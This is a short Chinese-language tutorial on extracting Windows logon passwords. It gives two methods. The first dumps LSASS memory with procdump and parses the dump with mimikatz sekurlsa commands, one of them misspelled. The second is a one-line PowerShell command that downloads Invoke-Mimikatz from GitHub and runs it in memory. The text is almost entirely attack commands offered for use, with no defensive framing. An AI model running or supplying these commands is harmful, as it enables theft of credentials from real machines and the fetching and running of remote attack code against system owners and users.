方法一:
下载所需工具:procdump和mimikatz
1.以管理员身份打开cmd,cd进入procdump工具所在目录,输入下面的命令
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
2.此命令将自动导出的lsass.dmp文件粘贴到mimikatz执行文件目录中
3.打开mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpsswords full
方法二:(此方法简单)
1.以管理员身份打开cmd(复制下面的命令回车)
powershell "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"